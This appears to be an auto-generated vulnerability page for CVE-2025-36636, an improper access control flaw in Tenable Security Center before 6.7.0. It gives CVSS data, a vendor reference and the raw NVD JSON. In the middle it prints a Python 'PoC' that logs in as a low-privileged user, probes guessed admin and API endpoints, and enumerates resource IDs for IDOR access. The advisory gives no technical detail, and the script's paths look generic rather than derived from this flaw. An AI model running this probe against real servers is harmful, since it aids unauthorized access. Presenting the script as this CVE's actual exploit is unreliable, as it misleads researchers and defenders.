Security Vulnerability Report
CVE-2025-36636 CVSS 4.3 MEDIUM

Published: 2025-10-08 16:15:37
Last Modified: 2026-04-15 00:35:42

Description

In Tenable Security Center versions prior to 6.7.0, an improper access control vulnerability exists where an authenticated user could access areas outside of their authorized scope.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data is available in the record. The affected product, as stated in the description, is:

Tenable Security Center < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36636 - Tenable Security Center Improper Access Control PoC
# This PoC demonstrates how a low-privileged authenticated user can access
# resources outside their authorized scope.
import requests

TARGET_URL = "https://target-tenable-sc.example.com"
LOW_PRIV_USER = "lowpriv_user"
LOW_PRIV_PASS = "password123"

# Step 1: Authenticate with low-privilege credentials
session = requests.Session()
login_url = f"{TARGET_URL}/login"
login_data = {
    "username": LOW_PRIV_USER,
    "password": LOW_PRIV_PASS
}
response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Attempt to access admin-restricted resources
# These endpoints should be restricted to admin users only
admin_endpoints = [
    "/admin/users",
    "/admin/organizations",
    "/admin/scan-templates",
    "/scans/configurations",
    "/reports/advanced",
    "/api/v1/users",
    "/api/v1/organizations",
    "/api/v1/scans/configurations"
]

print("[*] Testing access to restricted endpoints...")
for endpoint in admin_endpoints:
    url = f"{TARGET_URL}{endpoint}"
    resp = session.get(url)
    status = resp.status_code
    if status == 200:
        print(f"[VULNERABLE] {endpoint} -> HTTP {status} (Unauthorized access granted!)")
    elif status in [403, 401]:
        print(f"[SAFE] {endpoint} -> HTTP {status} (Properly restricted)")
    else:
        print(f"[?] {endpoint} -> HTTP {status}")

# Step 3: Attempt IDOR by modifying resource IDs
# Try to access other users' data by changing ID parameters
print("\n[*] Testing IDOR vulnerability...")
idor_endpoints = [
    "/scans/results?scanId=1",
    "/reports/view?reportId=1",
    "/assets/details?assetId=1"
]

for endpoint in idor_endpoints:
    for resource_id in range(1, 10):
        url = f"{TARGET_URL}{endpoint.split('=')[0]}={resource_id}"
        resp = session.get(url)
        if resp.status_code == 200 and "admin" in resp.text.lower():
            print(f"[VULNERABLE] IDOR found at ID={resource_id}")
            break

References

https://docs.tenable.com/release-notes/Content/security-center/2025.htm#670 (vendor release notes, as listed in the record's reference data)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-36636",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-08T16:15:37.437",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Tenable Security Center versions prior to 6.7.0, an improper access control vulnerability exists where an authenticated user could access areas outside of their authorized scope."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.tenable.com/release-notes/Content/security-center/2025.htm#670",
        "source": "[email protected]"
      }
    ]
  }
}